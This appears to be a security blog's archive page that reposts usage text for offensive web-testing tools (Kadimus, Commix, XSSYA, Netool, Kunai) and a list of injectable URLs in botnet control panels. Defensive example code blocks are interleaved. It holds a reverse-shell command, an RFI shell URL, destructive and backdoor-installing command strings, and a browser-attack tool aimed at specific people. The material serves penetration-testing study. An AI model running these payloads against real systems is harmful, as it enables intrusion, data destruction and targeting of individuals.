Never Ending Security

It starts all here

Category Archives: Penetration Testing

BlindElephant Web Application Fingerprinter





The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant
License: LGPL

Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

Pre-requisites:

  • Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

Get the code:

Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your python installation has distutils, and then do:

cd blindelephant/src
sudo python setup.py install

(Windows users, omit sudo)

Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

$ BlindElephant.py 
Usage: BlindElephant.py [options] url appName

Options:
  -h, --help            show this help message and exit
  -p PLUGINNAME, --pluginName=PLUGINNAME
                        Fingerprint version of plugin (should apply to web app
                        given in appname)
  -s, --skip            Skip fingerprinting webpp, just fingerprint plugin
  -n NUMPROBES, --numProbes=NUMPROBES
                        Number of files to fetch (more may increase accuracy).
                        Default: 15
  -w, --winnow          If more than one version are returned, use winnowing
                        to attempt to narrow it down (up to numProbes
                        additional requests).
  -l, --list            List supported webapps and plugins

Use "guess" as app or plugin name to attempt to attempt to
discover which supported apps/plugins are installed.

$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com 

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM

Example Usage (Library):

$ python
>>> from blindelephant.Fingerprinters import WebAppFingerprinter
>>> 
>>> #Construct the fingerprinter
>>> #use default logger pointing to console; can pass "logger" arg to change output
>>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
>>> #do the fingerprint; data becomes available as instance vars
>>> fp.fingerprint()
(same as above)
>>> print "Possible versions:", fp.ver_list
Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
>>> print "Max possible version: ", fp.best_guess
Max possible version:  4.23-en-COM

The Static File Fingerprinting Approach in One Picture
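The picture is not reproduced here, so the approach is shown instead as an added example. This is not BlindElephant's own code: the release corpus, the file contents and the "target site" are constructed inline (a hypothetical web app with four releases) so that it runs offline; a real fingerprinter would hash the files of every unpacked release and fetch the same paths from the target over HTTP. The logic is the one the text describes: keep only paths whose hash differs between releases, fetch them, and intersect the version sets each hash points to.

```python
import hashlib
from collections import defaultdict

# Constructed release corpus for a hypothetical web app: version -> {path: content}.
# A real fingerprinter hashes files from every unpacked release tarball.
RELEASES = {
    "1.0": {"/js/app.js": "app v1", "/css/style.css": "style A", "/readme.txt": "readme 1"},
    "1.1": {"/js/app.js": "app v1", "/css/style.css": "style B", "/readme.txt": "readme 1"},
    "1.2": {"/js/app.js": "app v2", "/css/style.css": "style B", "/readme.txt": "readme 1"},
    "2.0": {"/js/app.js": "app v2", "/css/style.css": "style C", "/readme.txt": "readme 2"},
}


def file_hash(data):
    return hashlib.sha256(data.encode()).hexdigest()


def build_db(releases):
    """Precompute path -> {hash -> set of versions}.

    A path whose hash is the same in every release carries no information,
    so it is dropped; what remains are the differentiating paths.
    """
    db = defaultdict(lambda: defaultdict(set))
    for version, files in releases.items():
        for path, content in files.items():
            db[path][file_hash(content)].add(version)
    return {path: dict(hashes) for path, hashes in db.items() if len(hashes) > 1}


def fingerprint(db, fetch, max_probes=15):
    """Narrow the candidate version set by fetching differentiating paths.

    fetch(path) returns the file body, or None when the target answers 404.
    A body whose hash matches no release is treated as a locally modified
    file and ignored, rather than eliminating every version.
    """
    candidates = None
    for path in sorted(db)[:max_probes]:
        body = fetch(path)
        if body is None:
            continue
        versions = db[path].get(file_hash(body))
        if versions is None:
            continue
        candidates = set(versions) if candidates is None else candidates & versions
        if len(candidates) == 1:
            break
    return sorted(candidates) if candidates else []


def best_guess(versions):
    """Highest surviving version, compared numerically component by component."""
    if not versions:
        return None
    return max(versions, key=lambda v: tuple(int(x) for x in v.split(".")))


# Constructed target: serves the files of release 1.1 unmodified.
SITE = {"/js/app.js": "app v1", "/css/style.css": "style B", "/readme.txt": "readme 1"}


def fake_fetch(path):
    return SITE.get(path)


if __name__ == "__main__":
    db = build_db(RELEASES)
    found = fingerprint(db, fake_fetch)
    print("Possible versions:", found)
    print("Best guess:", best_guess(found))
```

The same table is useful from the defending side: it lists exactly which static files on your own deployment give the version away, so removing or customising them (or checking that they are not publicly reachable) degrades the fingerprint, while a single modified file only removes one piece of evidence rather than breaking the match.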

Other Projects Like This


More information about BlindElephant can be found on: http://blindelephant.sourceforge.net




Exploit – Several Botnet(s) Vulnerabilities



BotNets are mainly created by great scripters, but some of them really lack on security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) shows how insecure the most recent botnets are!

Let's take a look at it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability

iBanking

Type: Shell Upload

Sh3ll: *(2)

(18) BotNets are VULNERABLE to SQL Injection:

 Random panel

Type: SQLi
Vuln: http://site.com/g.php?id=1

 Athena

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now

Casinoloader

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1

 Citadel

Type: SQLi
Vuln: http://localhost/cp.php?bots=1

DLOADER

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1

HERPES

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1

JACKPOS

Blind SQLi after you log in; pretty useless, so I won't bother.

JHTTP

Some SQL injection vulnerabilities past the assets folder.

SAKURA

Type: SQLi

http://localhost/func.php?showtopic=2
http://localhost/index.php?showtopic=322
http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312
http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor
http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10
http://localhost/showthread.php?t=123
http://localhost/showthread.php?t=23&cmd=32

Type: SQLi – POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds
http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123
http://localhost/sakuraadmin44.php?threads=21 POST: snick=1

SILENCE WINLOCKER V5.0

SQL injection.

http://localhost/forma.php?pin=4322
http://localhost/index.php?x=1&act=delete&id=1
http://localhost/picture.php?pin=8787
http://localhost/tmp/get.php?pin=1334

SMOKE LOADER

Type: SQLi

http://localhost/control.php?id=1
http://localhost/guest.php?id=1

POST

SOLARBOT

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD

SPY-EYE

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998

TINBA

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate

UMBRA

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1

VERTEXNET

There are SQL injection vulnerabilities, but the likelihood of you actually finding a way of exploiting them is low.

ZEUS AND ZEUS EVO

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8

ZSKIMMER

Type: SQLi

Vuln: http://localhost/process.php?xy=2

(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:

CYTHOSIA BOTNET

Type: Stored XSS and iFrame redirect

Click "add task". Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME

Then click "Create Task" and finally click "Tasks". VOILA!

(Credits to asterea for finding this botnet panel)

CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

PLASMA

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore, they have also identified (5) secure Sh3lls :-)

Here you all can find the Secure Ones!

 Alin1

Nothing, unless logged in.

 Betabot

Nope.

 CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

SMSBOT

Nothing interesting.

SPY POSCARDSTEALER

Nope, it's secure.


If you find any new vulnerability, you can contact them directly below!

Contact: asterea@exploit.im

Twitter: 4sterea


(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv

Nettool.sh – Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks



The Netool.sh toolkit provides a fast and easy way for newcomers to IT security pentesting, and for experienced users as well, to use almost all the features a Man-In-The-Middle position can provide on a local LAN: scanning, sniffing and social engineering attacks ("spear phishing attacks")...

Netool is a toolkit written in bash, Python and Ruby that lets you automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. It makes tasks such as sniffing TCP/UDP traffic, Man-In-The-Middle attacks, SSL sniffing, DNS spoofing, DoS attacks on WAN/LAN networks and TCP/UDP packet manipulation with etter-filters easy, gives you the ability to capture pictures of the target's web browsing (driftnet), and uses macchanger to change the MAC address as a decoy for scans.

Supported operating systems:
Ubuntu Linux, Kali Linux, BackTrack Linux (discontinued), FreeBSD, Mac OS X (discontinued)

The Rootsector module lets you automate some attacks over DNS spoofing + MitM (phishing, social engineering) using the Metasploit, Apache2 and Ettercap frameworks, such as the generation of payloads, shellcode and backdoors delivered via DNS spoofing and MitM to redirect a target to your phishing web page. It recently introduced the scanner inurlbr (by cleiton). This tool is brought to you by: peterubuntu10

Video:


More information can be found at: http://sourceforge.net/projects/netoolsh

BTS PenTesting Lab – Open Source vulnerable Web Application Platform



Are you a Penetration Tester, an Information Security Specialist and/or simply a Learner in Cyber Security?

This might be the right pentesting platform to perform your penetration tests and upgrade your skillz! This is BTS PenTesting Lab, an open source vulnerable web application platform developed by the Cyber Security & Privacy Foundation (www.cysecurity.org). It can be used to perform and learn about many different types of web application vulnerabilities.

Currently, the app contains the following types of vulnerabilities:

  • SQL Injection
  • XSS (includes Flash-based XSS)
  • CSRF
  • Clickjacking
  • SSRF
  • File Inclusion
  • Code Execution
  • Insecure Direct Object Reference
  • Unrestricted File Upload vulnerability
  • Open URL Redirection
  • Server Side Includes (SSI) Injection

and more…


More information can be found at: http://sourceforge.net/projects/btslab

XSSYA V-2.0 For Cross Site Scripting Vulnerability Confirmation Written In Python


XSSYA-V-2.0 (XSS Vulnerability Confirmation)

XSSYA is a Cross Site Scripting scanner and vulnerability confirmation tool, working in two methods:

  • Method 1: confirmation by request and response
  • Method 2: confirmation by executing an encoded payload and searching for the same payload, decoded, in the web page's HTML code
  • Supports HTTPS
  • After confirmation, executes the payload to get cookies
  • Identifies 3 types of WAF (Mod_Security, WebKnight, F5 BIG-IP)
  • Runs on Windows and Linux

XSSYA contains a library of encoded payloads to bypass WAFs (Web Application Firewalls). It also supports saving the web HTML code before executing the payload and viewing the web HTML code on the screen or terminal.

$ python xssya.py

Example:

$ python xssya.py http://www.domain.com/
$ python xssya.py http://www.domain.com=
$ python xssya.py http://www.domain.com?

• What has been changed? XSSYA v2.0 has more payloads: the library now contains 41 payloads to enhance the detection level. The XSS scanner has been removed from XSSYA to reduce false positives. URLs to be tested used to allow no character at the end of the URL except (/ – = – ?), but this limitation has now been removed.

• What's new in XSSYA V2.0? Custom Payload 1: you have the ability to choose your custom payload (Ex: ), and you can encode your custom payload with different types of encodings such as B64, HEX, URL-encode, HEX with semicolons, or HTML entities (single and double quotes only; brackets; "and"/"or"; or encode the whole payload with HTML entities). This feature also supports the XSS vulnerability confirmation method: you choose your custom payload and custom encoding, execute it, and if the response is 200, check for the same payload, decoded, in the page's HTML code.

• What's new in XSSYA V2.0? HTML5 payloads: XSSYA V2.0 contains a library of 44 HTML5 payloads.

• What's new in XSSYA V2.0? XSSYA has a library of the applications most affected by XSS (cross site scripting); this library currently covers Apache, WordPress and phpMyAdmin. If you choose the Apache application, it gives the CVE number, the affected Apache version and the link to the CVE for more details, so it is easy to search for a certain version that is affected by XSS.

• What's new in XSSYA V2.0? XSSYA has the feature to convert the attacker's IP address to hex, dword or octal form to bypass any security mechanism or IPS that exists on the target domain.

• What's new in XSSYA V2.0? XSSYA checks whether the target is vulnerable to XST (Cross Site Trace): it sends a custom TRACE request and checks if the target domain is vulnerable. The request looks like this:

TRACE / HTTP/1.0
Host: demo.testfire.net
Header1: < script >alert(document.cookie);

The modules that need to be downloaded are colorama-0.2.7 (https://pypi.python.org/pypi/colorama) and gdshortener 0.0.2 (https://pypi.python.org/pypi/gdshortener).
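The confirmation step ("execute the encoded payload, then look for the same payload decoded in the HTML") and the XST check are easy to get wrong, so here is an added example of both. It is not XSSYA's own code: the two endpoints (`vulnerable_page`, `hardened_page`), the marker payload and the TRACE responses are all constructed inline so it runs offline. The point it makes is the one behind the "reduce false positives" change above: a reflection that comes back entity-encoded is the application doing its job, and a scanner that only searches for the string would still count it.

```python
import base64
import html
import urllib.parse

# Marker payload; a scanner would iterate over a payload library.
PAYLOAD = "<script>alert(1)</script>"


def encode_payload(payload, scheme):
    """Encode a payload with one of the schemes the page names."""
    if scheme == "b64":
        return base64.b64encode(payload.encode()).decode()
    if scheme == "hex":
        return payload.encode().hex()
    if scheme == "url":
        return urllib.parse.quote(payload, safe="")
    if scheme == "html":
        return html.escape(payload, quote=True)
    raise ValueError("unknown encoding scheme: %s" % scheme)


def classify_reflection(payload, body):
    """How did the payload come back in the response body?

    'raw'     - present verbatim: the page reflects input without encoding
    'escaped' - present only after HTML entities are decoded: output encoding
                is in place and the reflection is not a finding as-is
    'absent'  - not reflected in this response
    Checking for the decoded form is what turns a plain "string found"
    scanner into a confirmation step with fewer false positives.
    """
    if payload in body:
        return "raw"
    if payload in html.unescape(body):
        return "escaped"
    return "absent"


# Two constructed endpoints standing in for a remote site. Each receives the
# raw query string and URL-decodes it, as a web framework would.
def vulnerable_page(query):
    q = urllib.parse.parse_qs(query).get("q", [""])[0]
    return "<html><body>Results for: " + q + "</body></html>"


def hardened_page(query):
    q = urllib.parse.parse_qs(query).get("q", [""])[0]
    return "<html><body>Results for: " + html.escape(q, quote=True) + "</body></html>"


def probe(page, payload=PAYLOAD):
    """Send the URL-encoded payload in ?q= and classify the reflection."""
    return classify_reflection(payload, page("q=" + encode_payload(payload, "url")))


# Cross Site Trace check: a server with TRACE enabled echoes the request,
# including any header we put in it. Both responses are constructed.
TRACE_MARKER = "XST-CHECK-7f3a"
TRACE_ENABLED = (
    "HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n"
    "TRACE / HTTP/1.0\r\nHost: demo.example\r\nHeader1: " + TRACE_MARKER + "\r\n"
)
TRACE_DISABLED = "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n"


def xst_reflected(response, marker=TRACE_MARKER):
    """True when a TRACE response is 200 and echoes our marker header."""
    head, _, body = response.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    return status_line.startswith("HTTP/1.") and " 200 " in status_line and marker in body


if __name__ == "__main__":
    for scheme in ("b64", "hex", "url", "html"):
        print(scheme, encode_payload(PAYLOAD, scheme))
    print("vulnerable endpoint:", probe(vulnerable_page))
    print("hardened endpoint:  ", probe(hardened_page))
    print("TRACE reflected:", xst_reflected(TRACE_ENABLED), xst_reflected(TRACE_DISABLED))
```

The remedy for the "raw" case is the one `hardened_page` shows: contextual output encoding of every reflected value. For the XST case the fix is server-side, disabling the TRACE method, and the check above is the regression test for it.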


More information can be found at: https://github.com/yehia-mamdouh/XSSYA-V-2.0

Kadimus For LFI / RFI Scan And Exploit Tool


Kadimus

LFI Scan & Exploit Tool

Kadimus is a tool to check sites for LFI vulnerabilities, and also to exploit them.

Features:

  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • Source code disclosure
  • Multi thread scanner
  • Command shell interface through HTTP Request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  • Proxy socks5 support for bind connections

Compile:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus

You can run the configure script:

./configure

Or follow these steps:

Installing libcurl:

  • CentOS/Fedora
# yum install libcurl-devel
  • Debian based
# apt-get install libcurl4-openssl-dev

Installing libpcre:

  • CentOS/Fedora
# yum install pcre-devel
  • Debian based
# apt-get install libpcre3-dev

Installing libssh:

  • CentOS/Fedora
# yum install libssh-devel
  • Debian based
# apt-get install libssh-dev

And finally:

$ make

Options:

  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect
    --b-proxy STRING            IP/Hostname of socks5 proxy
    --b-port NUMBER             Port number of socks5 proxy

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors: just put the remote URL in resource/common_files.txt together with the regex that identifies it, for example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
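Every technique listed above leaves a distinctive request target in the web server's access log, which is where a defender catches this activity. The following is an added example of that detection logic, not part of Kadimus: it parses combined-format log lines (constructed here, with the shapes of the `?pg=` probes from the usage examples), URL-decodes each target twice so doubly-encoded probes are not missed, and matches the indicators the feature list names (php://input, php://filter, data:// wrappers, /proc/self/environ, /var/log/auth.log, %00 null bytes, directory traversal).

```python
import re
import urllib.parse
from collections import Counter

# Combined log format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# (rule name, regex applied to the fully URL-decoded request target)
RULES = [
    ("php_wrapper_input", re.compile(r"php://input", re.I)),
    ("php_wrapper_filter", re.compile(r"php://filter", re.I)),
    ("data_wrapper", re.compile(r"\bdata:(//)?text", re.I)),
    ("proc_environ", re.compile(r"/proc/self/environ")),
    ("log_poisoning_auth", re.compile(r"/var/log/auth\.log")),
    ("null_byte", re.compile("\x00")),
    ("traversal", re.compile(r"(\.\./){2,}")),
]


def decode_target(target):
    """URL-decode twice so doubly-encoded probes (%252e%252e/, %2500) do not
    slip past the rules; %00 becomes a literal NUL byte."""
    return urllib.parse.unquote(urllib.parse.unquote(target))


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Return [(ip, [rule names], raw target)] for each request that matches."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = decode_target(rec["target"])
        names = [name for name, rx in RULES if rx.search(decoded)]
        if names:
            hits.append((rec["ip"], names, rec["target"]))
    return hits


def summarize(hits):
    """Count matching requests per source IP, the figure you would alert on."""
    return dict(Counter(ip for ip, _, _ in hits))


# Constructed sample log: one scanning client and one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/May/2015:10:00:01 +0000] "GET /?pg=contact HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/May/2015:10:00:02 +0000] "GET /?pg=php://input%00 HTTP/1.1" 200 87',
    '203.0.113.9 - - [01/May/2015:10:00:03 +0000] "GET /?pg=/var/log/auth.log HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/May/2015:10:00:04 +0000] "GET /?pg=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/May/2015:10:00:05 +0000] "GET /?pg=%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 300',
    '198.51.100.4 - - [01/May/2015:10:00:06 +0000] "GET /images/logo.png HTTP/1.1" 200 1400',
]

if __name__ == "__main__":
    for ip, names, target in detect(SAMPLE_LOG):
        print(ip, ",".join(names), target)
    print(summarize(detect(SAMPLE_LOG)))
```

A 200 status on the `/var/log/auth.log` or `php://filter` line is the detail to look at first: it means the include actually resolved, whereas the same probes answered with 4xx or 5xx are a scan that found nothing. On the application side, the fix that makes all of these inert is an allowlist of includable page names instead of passing `pg` to `include`.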

More information can be found at: https://github.com/P0cL4bs/Kadimus

Commix – An Command Injection Exploiter To Test And Find Web Application Bugs


   ___    ___     ___ ___     ___ ___ /\_\   __  _ 
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

General Information

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.

Disclaimer

The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Commix comes pre-installed on the following Linux distributions:

Download commix by cloning the Git repository:

git clone https://github.com/stasinopoulos/commix.git commix

Usage

Usage: python commix.py [options]

Options

-h, --help            Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target

This options has to be provided, to define the target URL.

--url=URL           Target URL
--url-reload        Reload target URL after command execution.

Request

These options can be used, to specify how to connect to the target
URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--random-agent      Use a randomly selected HTTP User-Agent header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Enumeration

These options can be used, to enumerate the target host.

--current-user  Retrieve current user.
--hostname      Retrieve server hostname.
--is-root       Check if the current user have root privs.
--sys-info      Retrieve system information.

Injection

These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag to specify
                    the testable parameter).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--root-dir=SRV_R..  Set remote absolute path of web server's root
                    directory (Default: /var/www/).
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').
--alter-shell       Use an alternative os-shell (Python). Available only
                    for 'tempfile-based' injections.
--os-shell=OS_SH..  Execute a single operating system command.

Usage Examples

Exploiting Damn Vulnerable Web App:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="'" --suffix="//"

Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique :

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=INJECT_HERE&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="file-based" --root-dir="/"
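The parameter Commix is pointed at in the DVWA example above (`ip=`) is the textbook case: a host name that ends up inside a shell command. Here is an added example, not part of Commix or DVWA, of that vulnerable pattern beside its hardened form. `build_ping_command_unsafe` only builds the shell string (it never runs it) so the reader can see what an injected value turns into; the hardened path validates the value against an allowlist and passes an argument list to `subprocess` with no shell at all. The validator and the metacharacter check are this example's own.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and hyphens, no leading hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$",
    re.I,
)
# Characters a POSIX shell treats specially; their presence in a "host"
# value is what an input filter or WAF rule would key on.
SHELL_META_RE = re.compile(r"[;&|`$(){}<>\n\r]")


def build_ping_command_unsafe(host):
    """The vulnerable pattern: user input interpolated into a shell string.

    Run with shell=True, a value such as '127.0.0.1; id' is two commands,
    the 'classic' injection Commix tests for; a value built around 'sleep'
    is its time-based variant. This function only returns the string.
    """
    return "ping -c 1 " + host


def has_shell_metacharacters(value):
    """Cheap screening check; useful for logging, not a substitute for the allowlist."""
    return SHELL_META_RE.search(value) is not None


def is_valid_host(value):
    """Accept only a literal IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(value) is not None


def build_ping_command_safe(host):
    """Hardened form: validate first, then build an argv list (no shell)."""
    if not is_valid_host(host):
        raise ValueError("rejected host value: %r" % host)
    # The allowlist guarantees the value cannot start with '-', so it can
    # never be parsed as a ping option either.
    return ["ping", "-c", "1", host]


def run_ping(host, timeout=5.0):
    """Execute the hardened command and return its exit status."""
    return subprocess.run(build_ping_command_safe(host),
                          capture_output=True, timeout=timeout).returncode


if __name__ == "__main__":
    injected = "127.0.0.1; id"
    print("unsafe shell string:", build_ping_command_unsafe(injected))
    print("metacharacters present:", has_shell_metacharacters(injected))
    print("safe argv for example.org:", build_ping_command_safe("example.org"))
    try:
        build_ping_command_safe(injected)
    except ValueError as exc:
        print("hardened handler:", exc)
```

With no shell in the execution path, every technique class Commix enumerates (classic, eval-based, time-based, file-based) has nothing to interpret the metacharacters, and the allowlist stops the value from reaching the binary as anything other than one host argument.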

Command injection testbeds

A collection of pwnable VMs that includes web apps vulnerable to command injection.

Exploitation Demos


More information can be found at: https://github.com/stasinopoulos/commix

Kunai – A Tool For Pwning And Info Gathering via User Browser


Kunai 0.2

Sometimes there is a need to obtain the IP address of a specific person or to perform client-side attacks via the user's browser. This is what you need in such situations.

Kunai is a simple script which collects a lot of information about a visitor and saves the output to a file; furthermore, you may try to perform attacks on the user's browser using BeEF or Metasploit.

